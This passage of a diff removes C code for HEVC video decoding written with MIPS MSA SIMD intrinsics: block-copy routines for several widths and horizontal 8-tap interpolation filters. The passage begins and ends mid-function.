for (; res--; ) { - uint64_t out0; - uint32_t out1; - src0 = LD_SB(src); - src += src_stride; - in0 = (v8i16)__msa_ilvr_b((v16i8) zero, (v16i8) src0); - in0 = in0 << 6; - out0 = __msa_copy_u_d((v2i64) in0, 0); - out1 = __msa_copy_u_w((v4i32) in0, 2); - SD(out0, dst); - SW(out1, dst + 4); - dst += dst_stride; - } -} - -static void hevc_copy_8w_msa(const uint8_t *src, int32_t src_stride, - int16_t *dst, int32_t dst_stride, - int32_t height) -{ - v16i8 zero = { 0 }; - - if (2 == height) { - v16i8 src0, src1; - v8i16 in0, in1; - - LD_SB2(src, src_stride, src0, src1); - - ILVR_B2_SH(zero, src0, zero, src1, in0, in1); - in0 <<= 6; - in1 <<= 6; - ST_SH2(in0, in1, dst, dst_stride); - } else if (4 == height) { - v16i8 src0, src1, src2, src3; - v8i16 in0, in1, in2, in3; - - LD_SB4(src, src_stride, src0, src1, src2, src3); - - ILVR_B4_SH(zero, src0, zero, src1, zero, src2, zero, src3, - in0, in1, in2, in3); - SLLI_4V(in0, in1, in2, in3, 6); - ST_SH4(in0, in1, in2, in3, dst, dst_stride); - } else if (6 == height) { - v16i8 src0, src1, src2, src3, src4, src5; - v8i16 in0, in1, in2, in3, in4, in5; - - LD_SB6(src, src_stride, src0, src1, src2, src3, src4, src5); - - ILVR_B4_SH(zero, src0, zero, src1, zero, src2, zero, src3, - in0, in1, in2, in3); - ILVR_B2_SH(zero, src4, zero, src5, in4, in5); - SLLI_4V(in0, in1, in2, in3, 6); - in4 <<= 6; - in5 <<= 6; - ST_SH6(in0, in1, in2, in3, in4, in5, dst, dst_stride); - } else if (0 == height % 8) { - uint32_t loop_cnt; - v16i8 src0, src1, src2, src3, src4, src5, src6, src7; - v8i16 in0, in1, in2, in3, in4, in5, in6, in7; - - for (loop_cnt = (height >> 3); loop_cnt--;) { - LD_SB8(src, src_stride, - src0, src1, src2, src3, src4, src5, src6, src7); - src += (8 * src_stride); - - ILVR_B4_SH(zero, src0, zero, src1, zero, src2, zero, src3, - in0, in1, in2, in3); - ILVR_B4_SH(zero, src4, zero, src5, zero, src6, zero, src7, - in4, in5, in6, in7); - SLLI_4V(in0, in1, in2, in3, 6); - SLLI_4V(in4, in5, in6, in7, 6); - ST_SH8(in0, in1, in2, in3, in4, in5, in6, in7, dst, dst_stride); - dst += (8 * dst_stride); - } - } -} - -static void hevc_copy_12w_msa(const uint8_t *src, int32_t src_stride, - int16_t *dst, int32_t dst_stride, - int32_t height) -{ - uint32_t loop_cnt; - uint32_t res = height & 0x07; - v16i8 zero = { 0 }; - v16i8 src0, src1, src2, src3, src4, src5, src6, src7; - v8i16 in0, in1, in0_r, in1_r, in2_r, in3_r; - - for (loop_cnt = (height >> 3); loop_cnt--;) { - LD_SB8(src, src_stride, src0, src1, src2, src3, src4, src5, src6, src7); - src += (8 * src_stride); - - ILVR_B4_SH(zero, src0, zero, src1, zero, src2, zero, src3, - in0_r, in1_r, in2_r, in3_r); - SLLI_4V(in0_r, in1_r, in2_r, in3_r, 6); - ILVL_W2_SB(src1, src0, src3, src2, src0, src1); - ILVR_B2_SH(zero, src0, zero, src1, in0, in1); - in0 <<= 6; - in1 <<= 6; - ST_SH4(in0_r, in1_r, in2_r, in3_r, dst, dst_stride); - ST_D4(in0, in1, 0, 1, 0, 1, dst + 8, dst_stride); - dst += (4 * dst_stride); - - ILVR_B4_SH(zero, src4, zero, src5, zero, src6, zero, src7, - in0_r, in1_r, in2_r, in3_r); - SLLI_4V(in0_r, in1_r, in2_r, in3_r, 6); - ILVL_W2_SB(src5, src4, src7, src6, src0, src1); - ILVR_B2_SH(zero, src0, zero, src1, in0, in1); - in0 <<= 6; - in1 <<= 6; - ST_SH4(in0_r, in1_r, in2_r, in3_r, dst, dst_stride); - ST_D4(in0, in1, 0, 1, 0, 1, dst + 8, dst_stride); - dst += (4 * dst_stride); - } - for (; res--; ) { - uint64_t out0; - src0 = LD_SB(src); - src += src_stride; - in0_r = (v8i16)__msa_ilvr_b((v16i8) zero, (v16i8) src0); - in0 = (v8i16)__msa_ilvl_b((v16i8) zero, (v16i8) src0); - in0_r = in0_r << 6; - in0 = in0 << 6; - ST_UH(in0_r, dst); - out0 = __msa_copy_u_d((v2i64) in0, 0); - SD(out0, dst + 8); - dst += dst_stride; - } -} - -static void hevc_copy_16w_msa(const uint8_t *src, int32_t src_stride, - int16_t *dst, int32_t dst_stride, - int32_t height) -{ - v16i8 zero = { 0 }; - - if (4 == height) { - v16i8 src0, src1, src2, src3; - v8i16 in0_r, in1_r, in2_r, in3_r; - v8i16 in0_l, in1_l, in2_l, in3_l; - - LD_SB4(src, src_stride, src0, src1, src2, src3); - - ILVR_B4_SH(zero, src0, zero, src1, zero, src2, zero, src3, - in0_r, in1_r, in2_r, in3_r); - ILVL_B4_SH(zero, src0, zero, src1, zero, src2, zero, src3, - in0_l, in1_l, in2_l, in3_l); - SLLI_4V(in0_r, in1_r, in2_r, in3_r, 6); - SLLI_4V(in0_l, in1_l, in2_l, in3_l, 6); - ST_SH4(in0_r, in1_r, in2_r, in3_r, dst, dst_stride); - ST_SH4(in0_l, in1_l, in2_l, in3_l, (dst + 8), dst_stride); - } else if (12 == height) { - v16i8 src0, src1, src2, src3, src4, src5, src6, src7; - v16i8 src8, src9, src10, src11; - v8i16 in0_r, in1_r, in2_r, in3_r; - v8i16 in0_l, in1_l, in2_l, in3_l; - - LD_SB8(src, src_stride, src0, src1, src2, src3, src4, src5, src6, src7); - src += (8 * src_stride); - LD_SB4(src, src_stride, src8, src9, src10, src11); - - ILVR_B4_SH(zero, src0, zero, src1, zero, src2, zero, src3, - in0_r, in1_r, in2_r, in3_r); - ILVL_B4_SH(zero, src0, zero, src1, zero, src2, zero, src3, - in0_l, in1_l, in2_l, in3_l); - SLLI_4V(in0_r, in1_r, in2_r, in3_r, 6); - SLLI_4V(in0_l, in1_l, in2_l, in3_l, 6); - ST_SH4(in0_r, in1_r, in2_r, in3_r, dst, dst_stride); - ST_SH4(in0_l, in1_l, in2_l, in3_l, (dst + 8), dst_stride); - dst += (4 * dst_stride); - - ILVR_B4_SH(zero, src4, zero, src5, zero, src6, zero, src7, - in0_r, in1_r, in2_r, in3_r); - ILVL_B4_SH(zero, src4, zero, src5, zero, src6, zero, src7, - in0_l, in1_l, in2_l, in3_l); - SLLI_4V(in0_r, in1_r, in2_r, in3_r, 6); - SLLI_4V(in0_l, in1_l, in2_l, in3_l, 6); - ST_SH4(in0_r, in1_r, in2_r, in3_r, dst, dst_stride); - ST_SH4(in0_l, in1_l, in2_l, in3_l, (dst + 8), dst_stride); - dst += (4 * dst_stride); - - ILVR_B4_SH(zero, src8, zero, src9, zero, src10, zero, src11, - in0_r, in1_r, in2_r, in3_r); - ILVL_B4_SH(zero, src8, zero, src9, zero, src10, zero, src11, - in0_l, in1_l, in2_l, in3_l); - SLLI_4V(in0_r, in1_r, in2_r, in3_r, 6); - SLLI_4V(in0_l, in1_l, in2_l, in3_l, 6); - ST_SH4(in0_r, in1_r, in2_r, in3_r, dst, dst_stride); - ST_SH4(in0_l, in1_l, in2_l, in3_l, (dst + 8), dst_stride); - } else if (0 == (height % 8)) { - uint32_t loop_cnt; - v16i8 src0, src1, src2, src3, src4, src5, src6, src7; - v8i16 in0_r, in1_r, in2_r, in3_r, in0_l, in1_l, in2_l, in3_l; - - for (loop_cnt = (height >> 3); loop_cnt--;) { - LD_SB8(src, src_stride, src0, src1, src2, src3, src4, src5, src6, - src7); - src += (8 * src_stride); - ILVR_B4_SH(zero, src0, zero, src1, zero, src2, zero, src3, in0_r, - in1_r, in2_r, in3_r); - ILVL_B4_SH(zero, src0, zero, src1, zero, src2, zero, src3, in0_l, - in1_l, in2_l, in3_l); - SLLI_4V(in0_r, in1_r, in2_r, in3_r, 6); - SLLI_4V(in0_l, in1_l, in2_l, in3_l, 6); - ST_SH4(in0_r, in1_r, in2_r, in3_r, dst, dst_stride); - ST_SH4(in0_l, in1_l, in2_l, in3_l, (dst + 8), dst_stride); - dst += (4 * dst_stride); - - ILVR_B4_SH(zero, src4, zero, src5, zero, src6, zero, src7, in0_r, - in1_r, in2_r, in3_r); - ILVL_B4_SH(zero, src4, zero, src5, zero, src6, zero, src7, in0_l, - in1_l, in2_l, in3_l); - SLLI_4V(in0_r, in1_r, in2_r, in3_r, 6); - SLLI_4V(in0_l, in1_l, in2_l, in3_l, 6); - ST_SH4(in0_r, in1_r, in2_r, in3_r, dst, dst_stride); - ST_SH4(in0_l, in1_l, in2_l, in3_l, (dst + 8), dst_stride); - dst += (4 * dst_stride); - } - } -} - -static void hevc_copy_24w_msa(const uint8_t *src, int32_t src_stride, - int16_t *dst, int32_t dst_stride, - int32_t height) -{ - uint32_t loop_cnt; - v16i8 zero = { 0 }; - v16i8 src0, src1, src2, src3, src4, src5, src6, src7; - v8i16 in0_r, in1_r, in2_r, in3_r, in0_l, in1_l, in2_l, in3_l; - - for (loop_cnt = (height >> 2); loop_cnt--;) { - LD_SB4(src, src_stride, src0, src1, src2, src3); - LD_SB4((src + 16), src_stride, src4, src5, src6, src7); - src += (4 * src_stride); - ILVR_B4_SH(zero, src0, zero, src1, zero, src2, zero, src3, in0_r, in1_r, - in2_r, in3_r); - ILVL_B4_SH(zero, src0, zero, src1, zero, src2, zero, src3, in0_l, in1_l, - in2_l, in3_l); - SLLI_4V(in0_r, in1_r, in2_r, in3_r, 6); - SLLI_4V(in0_l, in1_l, in2_l, in3_l, 6); - ST_SH4(in0_r, in1_r, in2_r, in3_r, dst, dst_stride); - ST_SH4(in0_l, in1_l, in2_l, in3_l, (dst + 8), dst_stride); - ILVR_B4_SH(zero, src4, zero, src5, zero, src6, zero, src7, in0_r, in1_r, - in2_r, in3_r); - SLLI_4V(in0_r, in1_r, in2_r, in3_r, 6); - ST_SH4(in0_r, in1_r, in2_r, in3_r, (dst + 16), dst_stride); - dst += (4 * dst_stride); - } -} - -static void hevc_copy_32w_msa(const uint8_t *src, int32_t src_stride, - int16_t *dst, int32_t dst_stride, - int32_t height) -{ - uint32_t loop_cnt; - v16i8 zero = { 0 }; - v16i8 src0, src1, src2, src3, src4, src5, src6, src7; - v8i16 in0_r, in1_r, in2_r, in3_r, in0_l, in1_l, in2_l, in3_l; - - for (loop_cnt = (height >> 2); loop_cnt--;) { - LD_SB4(src, src_stride, src0, src2, src4, src6); - LD_SB4((src + 16), src_stride, src1, src3, src5, src7); - src += (4 * src_stride); - - ILVR_B4_SH(zero, src0, zero, src1, zero, src2, zero, src3, in0_r, in1_r, - in2_r, in3_r); - ILVL_B4_SH(zero, src0, zero, src1, zero, src2, zero, src3, in0_l, in1_l, - in2_l, in3_l); - SLLI_4V(in0_r, in1_r, in2_r, in3_r, 6); - SLLI_4V(in0_l, in1_l, in2_l, in3_l, 6); - ST_SH4(in0_r, in0_l, in1_r, in1_l, dst, 8); - dst += dst_stride; - ST_SH4(in2_r, in2_l, in3_r, in3_l, dst, 8); - dst += dst_stride; - - ILVR_B4_SH(zero, src4, zero, src5, zero, src6, zero, src7, in0_r, in1_r, - in2_r, in3_r); - ILVL_B4_SH(zero, src4, zero, src5, zero, src6, zero, src7, in0_l, in1_l, - in2_l, in3_l); - SLLI_4V(in0_r, in1_r, in2_r, in3_r, 6); - SLLI_4V(in0_l, in1_l, in2_l, in3_l, 6); - ST_SH4(in0_r, in0_l, in1_r, in1_l, dst, 8); - dst += dst_stride; - ST_SH4(in2_r, in2_l, in3_r, in3_l, dst, 8); - dst += dst_stride; - } -} - -static void hevc_copy_48w_msa(const uint8_t *src, int32_t src_stride, - int16_t *dst, int32_t dst_stride, - int32_t height) -{ - uint32_t loop_cnt; - v16i8 zero = { 0 }; - v16i8 src0, src1, src2, src3, src4, src5, src6, src7; - v16i8 src8, src9, src10, src11; - v8i16 in0_r, in1_r, in2_r, in3_r, in4_r, in5_r; - v8i16 in0_l, in1_l, in2_l, in3_l, in4_l, in5_l; - - for (loop_cnt = (height >> 2); loop_cnt--;) { - LD_SB3(src, 16, src0, src1, src2); - src += src_stride; - LD_SB3(src, 16, src3, src4, src5); - src += src_stride; - LD_SB3(src, 16, src6, src7, src8); - src += src_stride; - LD_SB3(src, 16, src9, src10, src11); - src += src_stride; - - ILVR_B4_SH(zero, src0, zero, src1, zero, src2, zero, src3, - in0_r, in1_r, in2_r, in3_r); - ILVL_B4_SH(zero, src0, zero, src1, zero, src2, zero, src3, - in0_l, in1_l, in2_l, in3_l); - ILVR_B2_SH(zero, src4, zero, src5, in4_r, in5_r); - ILVL_B2_SH(zero, src4, zero, src5, in4_l, in5_l); - SLLI_4V(in0_r, in1_r, in2_r, in3_r, 6); - SLLI_4V(in0_l, in1_l, in2_l, in3_l, 6); - SLLI_4V(in4_r, in5_r, in4_l, in5_l, 6); - ST_SH6(in0_r, in0_l, in1_r, in1_l, in2_r, in2_l, dst, 8); - dst += dst_stride; - ST_SH6(in3_r, in3_l, in4_r, in4_l, in5_r, in5_l, dst, 8); - dst += dst_stride; - - ILVR_B4_SH(zero, src6, zero, src7, zero, src8, zero, src9, - in0_r, in1_r, in2_r, in3_r); - ILVL_B4_SH(zero, src6, zero, src7, zero, src8, zero, src9, - in0_l, in1_l, in2_l, in3_l); - ILVR_B2_SH(zero, src10, zero, src11, in4_r, in5_r); - ILVL_B2_SH(zero, src10, zero, src11, in4_l, in5_l); - SLLI_4V(in0_r, in1_r, in2_r, in3_r, 6); - SLLI_4V(in0_l, in1_l, in2_l, in3_l, 6); - SLLI_4V(in4_r, in5_r, in4_l, in5_l, 6); - ST_SH6(in0_r, in0_l, in1_r, in1_l, in2_r, in2_l, dst, 8); - dst += dst_stride; - ST_SH6(in3_r, in3_l, in4_r, in4_l, in5_r, in5_l, dst, 8); - dst += dst_stride; - } -} - -static void hevc_copy_64w_msa(const uint8_t *src, int32_t src_stride, - int16_t *dst, int32_t dst_stride, - int32_t height) -{ - uint32_t loop_cnt; - v16i8 zero = { 0 }; - v16i8 src0, src1, src2, src3, src4, src5, src6, src7; - v8i16 in0_r, in1_r, in2_r, in3_r, in0_l, in1_l, in2_l, in3_l; - - for (loop_cnt = (height >> 1); loop_cnt--;) { - LD_SB4(src, 16, src0, src1, src2, src3); - src += src_stride; - LD_SB4(src, 16, src4, src5, src6, src7); - src += src_stride; - - ILVR_B4_SH(zero, src0, zero, src1, zero, src2, zero, src3, - in0_r, in1_r, in2_r, in3_r); - ILVL_B4_SH(zero, src0, zero, src1, zero, src2, zero, src3, - in0_l, in1_l, in2_l, in3_l); - SLLI_4V(in0_r, in1_r, in2_r, in3_r, 6); - SLLI_4V(in0_l, in1_l, in2_l, in3_l, 6); - ST_SH4(in0_r, in0_l, in1_r, in1_l, dst, 8); - ST_SH4(in2_r, in2_l, in3_r, in3_l, (dst + 32), 8); - dst += dst_stride; - - ILVR_B4_SH(zero, src4, zero, src5, zero, src6, zero, src7, - in0_r, in1_r, in2_r, in3_r); - ILVL_B4_SH(zero, src4, zero, src5, zero, src6, zero, src7, - in0_l, in1_l, in2_l, in3_l); - SLLI_4V(in0_r, in1_r, in2_r, in3_r, 6); - SLLI_4V(in0_l, in1_l, in2_l, in3_l, 6); - ST_SH4(in0_r, in0_l, in1_r, in1_l, dst, 8); - ST_SH4(in2_r, in2_l, in3_r, in3_l, (dst + 32), 8); - dst += dst_stride; - } -} - -static void hevc_hz_8t_4w_msa(const uint8_t *src, int32_t src_stride, - int16_t *dst, int32_t dst_stride, - const int8_t *filter, int32_t height) -{ - uint32_t loop_cnt; - uint32_t res = (height & 0x07) >> 1; - v16i8 src0, src1, src2, src3, src4, src5, src6, src7; - v8i16 filt0, filt1, filt2, filt3; - v16i8 mask1, mask2, mask3; - v16i8 vec0, vec1, vec2, vec3; - v8i16 dst0, dst1, dst2, dst3; - v8i16 filter_vec, const_vec; - v16i8 mask0 = LD_SB(ff_hevc_mask_arr + 16); - - src -= 3; - const_vec = __msa_ldi_h(128); - const_vec <<= 6; - - filter_vec = LD_SH(filter); - SPLATI_H4_SH(filter_vec, 0, 1, 2, 3, filt0, filt1, filt2, filt3); - - mask1 = mask0 + 2; - mask2 = mask0 + 4; - mask3 = mask0 + 6; - - for (loop_cnt = (height >> 3); loop_cnt--;) { - LD_SB8(src, src_stride, src0, src1, src2, src3, src4, src5, src6, src7); - src += (8 * src_stride); - XORI_B8_128_SB(src0, src1, src2, src3, src4, src5, src6, src7); - - VSHF_B4_SB(src0, src1, mask0, mask1, mask2, mask3, - vec0, vec1, vec2, vec3); - dst0 = const_vec; - DPADD_SB4_SH(vec0, vec1, vec2, vec3, filt0, filt1, filt2, filt3, - dst0, dst0, dst0, dst0); - VSHF_B4_SB(src2, src3, mask0, mask1, mask2, mask3, - vec0, vec1, vec2, vec3); - dst1 = const_vec; - DPADD_SB4_SH(vec0, vec1, vec2, vec3, filt0, filt1, filt2, filt3, - dst1, dst1, dst1, dst1); - VSHF_B4_SB(src4, src5, mask0, mask1, mask2, mask3, - vec0, vec1, vec2, vec3); - dst2 = const_vec; - DPADD_SB4_SH(vec0, vec1, vec2, vec3, filt0, filt1, filt2, filt3, - dst2, dst2, dst2, dst2); - VSHF_B4_SB(src6, src7, mask0, mask1, mask2, mask3, - vec0, vec1, vec2, vec3); - dst3 = const_vec; - DPADD_SB4_SH(vec0, vec1, vec2, vec3, filt0, filt1, filt2, filt3, - dst3, dst3, dst3, dst3); - - ST_D8(dst0, dst1, dst2, dst3, 0, 1, 0, 1, 0, 1, 0, 1, dst, dst_stride); - dst += (8 * dst_stride); - } - for (; res--; ) { - LD_SB2(src, src_stride, src0, src1); - src += 2 * src_stride; - XORI_B2_128_SB(src0, src1); - VSHF_B4_SB(src0, src1, mask0, mask1, mask2, mask3, - vec0, vec1, vec2, vec3); - dst0 = const_vec; - DPADD_SB4_SH(vec0, vec1, vec2, vec3, filt0, filt1, filt2, filt3, - dst0, dst0, dst0, dst0); - ST_D2(dst0, 0, 1, dst, dst_stride); - dst += 2 * dst_stride; - } -} - -static void hevc_hz_8t_8w_msa(const uint8_t *src, int32_t src_stride, - int16_t *dst, int32_t dst_stride, - const int8_t *filter, int32_t height) -{ - uint32_t loop_cnt; - v16i8 src0, src1, src2, src3; - v8i16 filt0, filt1, filt2, filt3; - v16i8 mask1, mask2, mask3; - v16i8 vec0, vec1, vec2, vec3; - v8i16 dst0, dst1, dst2, dst3; - v8i16 filter_vec, const_vec; - v16i8 mask0 = LD_SB(ff_hevc_mask_arr); - - src -= 3; - const_vec = __msa_ldi_h(128); - const_vec <<= 6; - - filter_vec = LD_SH(filter); - SPLATI_H4_SH(filter_vec, 0, 1, 2, 3, filt0, filt1, filt2, filt3); - - mask1 = mask0 + 2; - mask2 = mask0 + 4; - mask3 = mask0 + 6; - - for (loop_cnt = (height >> 2); loop_cnt--;) { - LD_SB4(src, src_stride, src0, src1, src2, src3); - src += (4 * src_stride); - XORI_B4_128_SB(src0, src1, src2, src3); - - VSHF_B4_SB(src0, src0, mask0, mask1, mask2, mask3, - vec0, vec1, vec2, vec3); - dst0 = const_vec; - DPADD_SB4_SH(vec0, vec1, vec2, vec3, filt0, filt1, filt2, filt3, - dst0, dst0, dst0, dst0); - VSHF_B4_SB(src1, src1, mask0, mask1, mask2, mask3, - vec0, vec1, vec2, vec3); - dst1 = const_vec; - DPADD_SB4_SH(vec0, vec1, vec2, vec3, filt0, filt1, filt2, filt3, - dst1, dst1, dst1, dst1); - VSHF_B4_SB(src2, src2, mask0, mask1, mask2, mask3, - vec0, vec1, vec2, vec3); - dst2 = const_vec; - DPADD_SB4_SH(vec0, vec1, vec2, vec3, filt0, filt1, filt2, filt3, - dst2, dst2, dst2, dst2); - VSHF_B4_SB(src3, src3, mask0, mask1, mask2, mask3, - vec0, vec1, vec2, vec3); - dst3 = const_vec; - DPADD_SB4_SH(vec0, vec1, vec2, vec3, filt0, filt1, filt2, filt3, - dst3, dst3, dst3, dst3); - - ST_SH4(dst0, dst1, dst2, dst3, dst, dst_stride); - dst += (4 * dst_stride); - } -} - -static void hevc_hz_8t_12w_msa(const uint8_t *src, int32_t src_stride, - int16_t *dst, int32_t dst_stride, - const int8_t *filter, int32_t height) -{ - uint32_t loop_cnt; - int64_t res0, res1, res2, res3; - v16i8 src0, src1, src2, src3, src4, src5, src6, src7; - v16i8 mask0, mask1, mask2, mask3, mask4, mask5, mask6, mask7; - v16i8 vec0, vec1, vec2, vec3, vec4, vec5; - v8i16 filt0, filt1, filt2, filt3, dst0, dst1, dst2, dst3, dst4, dst5; - v8i16 filter_vec, const_vec; - - src -= 3; - const_vec = __msa_ldi_h(128); - const_vec <<= 6; - - filter_vec = LD_SH(filter); - SPLATI_H4_SH(filter_vec, 0, 1, 2, 3, filt0, filt1, filt2, filt3); - - mask0 = LD_SB(ff_hevc_mask_arr); - mask1 = mask0 + 2; - mask2 = mask0 + 4; - mask3 = mask0 + 6; - mask4 = LD_SB(ff_hevc_mask_arr + 16); - mask5 = mask4 + 2; - mask6 = mask4 + 4; - mask7 = mask4 + 6; - - for (loop_cnt = 4; loop_cnt--;) { - LD_SB4(src, src_stride, src0, src1, src2, src3); - LD_SB4(src + 8, src_stride, src4, src5, src6, src7); - src += (4 * src_stride); - XORI_B8_128_SB(src0, src1, src2, src3, src4, src5, src6, src7); - - dst0 = const_vec; - dst1 = const_vec; - dst2 = const_vec; - dst3 = const_vec; - dst4 = const_vec; - dst5 = const_vec; - VSHF_B2_SB(src0, src0, src1, src1, mask0, mask0, vec0, vec1); - VSHF_B2_SB(src2, src2, src3, src3, mask0, mask0, vec2, vec3); - VSHF_B2_SB(src4, src5, src6, src7, mask4, mask4, vec4, vec5); - DPADD_SB4_SH(vec0, vec1, vec2, vec3, filt0, filt0, filt0, filt0, dst0, - dst1, dst2, dst3); - DPADD_SB2_SH(vec4, vec5, filt0, filt0, dst4, dst5); - VSHF_B2_SB(src0, src0, src1, src1, mask1, mask1, vec0, vec1); - VSHF_B2_SB(src2, src2, src3, src3, mask1, mask1, vec2, vec3); - VSHF_B2_SB(src4, src5, src6, src7, mask5, mask5, vec4, vec5); - DPADD_SB4_SH(vec0, vec1, vec2, vec3, filt1, filt1, filt1, filt1, dst0, - dst1, dst2, dst3); - DPADD_SB2_SH(vec4, vec5, filt1, filt1, dst4, dst5); - VSHF_B2_SB(src0, src0, src1, src1, mask2, mask2, vec0, vec1); - VSHF_B2_SB(src2, src2, src3, src3, mask2, mask2, vec2, vec3); - VSHF_B2_SB(src4, src5, src6, src7, mask6, mask6, vec4, vec5); - DPADD_SB4_SH(vec0, vec1, vec2, vec3, filt2, filt2, filt2, filt2, dst0, - dst1, dst2, dst3); - DPADD_SB2_SH(vec4, vec5, filt2, filt2, dst4, dst5); - VSHF_B2_SB(src0, src0, src1, src1, mask3, mask3, vec0, vec1); - VSHF_B2_SB(src2, src2, src3, src3, mask3, mask3, vec2, vec3); - VSHF_B2_SB(src4, src5, src6, src7, mask7, mask7, vec4, vec5); - DPADD_SB4_SH(vec0, vec1, vec2, vec3, filt3, filt3, filt3, filt3, dst0, - dst1, dst2, dst3); - DPADD_SB2_SH(vec4, vec5, filt3, filt3, dst4, dst5); - - res0 = __msa_copy_s_d((v2i64) dst4, 0); - res1 = __msa_copy_s_d((v2i64) dst4, 1); - res2 = __msa_copy_s_d((v2i64) dst5, 0); - res3 = __msa_copy_s_d((v2i64) dst5, 1); - ST_SH4(dst0, dst1, dst2, dst3, dst, dst_stride); - SD4(res0, res1, res2, res3, (dst + 8), dst_stride); - dst += (4 * dst_stride); - } -} - -static void hevc_hz_8t_16w_msa(const uint8_t *src, int32_t src_stride, - int16_t *dst, int32_t dst_stride, - const int8_t *filter, int32_t height) -{ - uint32_t loop_cnt; - v16i8 src0, src1, src2, src3; - v8i16 filt0, filt1, filt2, filt3; - v16i8 mask1, mask2, mask3; - v16i8 vec0, vec1, vec2, vec3; - v8i16 dst0, dst1, dst2, dst3; - v8i16 filter_vec, const_vec; - v16i8 mask0 = LD_SB(ff_hevc_mask_arr); - - src -= 3; - const_vec = __msa_ldi_h(128); - const_vec <<= 6; - - filter_vec = LD_SH(filter); - SPLATI_H4_SH(filter_vec, 0, 1, 2, 3, filt0, filt1, filt2, filt3); - - mask1 = mask0 + 2; - mask2 = mask0 + 4; - mask3 = mask0 + 6; - - for (loop_cnt = (height >> 1); loop_cnt--;) { - LD_SB2(src, src_stride, src0, src2); - LD_SB2(src + 8, src_stride, src1, src3); - src += (2 * src_stride); - XORI_B4_128_SB(src0, src1, src2, src3); - - dst0 = const_vec; - dst1 = const_vec; - dst2 = const_vec; - dst3 = const_vec; - VSHF_B2_SB(src0, src0, src1, src1, mask0, mask0, vec0, vec1); - VSHF_B2_SB(src2, src2, src3, src3, mask0, mask0, vec2, vec3); - DPADD_SB4_SH(vec0, vec1, vec2, vec3, filt0, filt0, filt0, filt0, dst0, - dst1, dst2, dst3); - VSHF_B2_SB(src0, src0, src1, src1, mask1, mask1, vec0, vec1); - VSHF_B2_SB(src2, src2, src3, src3, mask1, mask1, vec2, vec3); - DPADD_SB4_SH(vec0, vec1, vec2, vec3, filt1, filt1, filt1, filt1, dst0, - dst1, dst2, dst3); - VSHF_B2_SB(src0, src0, src1, src1, mask2, mask2, vec0, vec1); - VSHF_B2_SB(src2, src2, src3, src3, mask2, mask2, vec2, vec3); - DPADD_SB4_SH(vec0, vec1, vec2, vec3, filt2, filt2, filt2, filt2, dst0, - dst1, dst2, dst3); - VSHF_B2_SB(src0, src0, src1, src1, mask3, mask3, vec0, vec1); - VSHF_B2_SB(src2, src2, src3, src3, mask3, mask3, vec2, vec3); - DPADD_SB4_SH(vec0, vec1, vec2, vec3, filt3, filt3, filt3, filt3, dst0, - dst1, dst2, dst3); - - ST_SH2(dst0, dst2, dst, dst_stride); - ST_SH2(dst1, dst3, dst + 8, dst_stride); - dst += (2 * dst_stride); - } -} - -static void hevc_hz_8t_24w_msa(const uint8_t *src, int32_t src_stride, - int16_t *dst, int32_t dst_stride, - const int8_t *filter, int32_t height) -{ - uint32_t loop_cnt; - v16i8 src0, src1, src2, src3; - v8i16 filt0, filt1, filt2, filt3; - v16i8 mask1, mask2, mask3, mask4, mask5, mask6, mask7; - v16i8 vec0, vec1, vec2, vec3, vec4, vec5; - v8i16 dst0, dst1, dst2, dst3, dst4, dst5; - v8i16 filter_vec, const_vec; - v16i8 mask0 = LD_SB(ff_hevc_mask_arr); - - src -= 3; - filter_vec = LD_SH(filter); - SPLATI_H4_SH(filter_vec, 0, 1, 2, 3, filt0, filt1, filt2, filt3); - - mask1 = mask0 + 2; - mask2 = mask0 + 4; - mask3 = mask0 + 6; - mask4 = mask0 + 8; - mask5 = mask0 + 10; - mask6 = mask0 + 12; - mask7 = mask0 + 14; - - const_vec = __msa_ldi_h(128); - const_vec <<= 6; - - for (loop_cnt = (height >> 1); loop_cnt--;) { - LD_SB2(src, 16, src0, src1); - src += src_stride; - LD_SB2(src, 16, src2, src3); - src += src_stride; - XORI_B4_128_SB(src0, src1, src2, src3); - - dst0 = const_vec; - dst1 = const_vec; - dst2 = const_vec; - dst3 = const_vec; - dst4 = const_vec; - dst5 = const_vec; - VSHF_B2_SB(src0, src0, src0, src1, mask0, mask4, vec0, vec1); - VSHF_B2_SB(src1, src1, src2, src2, mask0, mask0, vec2, vec3); - VSHF_B2_SB(src2, src3, src3, src3, mask4, mask0, vec4, vec5); - DPADD_SB4_SH(vec0, vec1, vec2, vec3, filt0, filt0, filt0, filt0, dst0, - dst1, dst2, dst3); - DPADD_SB2_SH(vec4, vec5, filt0, filt0, dst4, dst5); - VSHF_B2_SB(src0, src0, src0, src1, mask1, mask5, vec0, vec1); - VSHF_B2_SB(src1, src1, src2, src2, mask1, mask1, vec2, vec3); - VSHF_B2_SB(src2, src3, src3, src3, mask5, mask1, vec4, vec5); - DPADD_SB4_SH(vec0, vec1, vec2, vec3, filt1, filt1, filt1, filt1, dst0, - dst1, dst2, dst3); - DPADD_SB2_SH(vec4, vec5, filt1, filt1, dst4, dst5); - VSHF_B2_SB(src0, src0, src0, src1, mask2, mask6, vec0, vec1); - VSHF_B2_SB(src1, src1, src2, src2, mask2, mask2, vec2, vec3); - VSHF_B2_SB(src2, src3, src3, src3, mask6, mask2, vec4, vec5); - DPADD_SB4_SH(vec0, vec1, vec2, vec3, filt2, filt2, filt2, filt2, dst0, - dst1, dst2, dst3); - DPADD_SB2_SH(vec4, vec5, filt2, filt2, dst4, dst5); - VSHF_B2_SB(src0, src0, src0, src1, mask3, mask7, vec0, vec1); - VSHF_B2_SB(src1, src1, src2, src2, mask3, mask3, vec2, vec3); - VSHF_B2_SB(src2, src3, src3, src3, mask7, mask3, vec4, vec5); - DPADD_SB4_SH(vec0, vec1, vec2, vec3, filt3, filt3, filt3, filt3, dst0, - dst1, dst2, dst3); - DPADD_SB2_SH(vec4, vec5, filt3, filt3, dst4, dst5); - - ST_SH2(dst0, dst1, dst, 8); - ST_SH(dst2, dst + 16); - dst += dst_stride; - ST_SH2(dst3, dst4, dst, 8); - ST_SH(dst5, dst + 16); - dst += dst_stride; - } -} - -static void hevc_hz_8t_32w_msa(const uint8_t *src, int32_t src_stride, - int16_t *dst, int32_t dst_stride, - const int8_t *filter, int32_t height) -{ - uint32_t loop_cnt; - v16i8 src0, src1, src2; - v8i16 filt0, filt1, filt2, filt3; - v16i8 mask1, mask2, mask3, mask4, mask5, mask6, mask7; - v16i8 vec0, vec1, vec2, vec3; - v8i16 dst0, dst1, dst2, dst3; - v8i16 filter_vec, const_vec; - v16i8 mask0 = LD_SB(ff_hevc_mask_arr); - - src -= 3; - filter_vec = LD_SH(filter); - SPLATI_H4_SH(filter_vec, 0, 1, 2, 3, filt0, filt1, filt2, filt3); 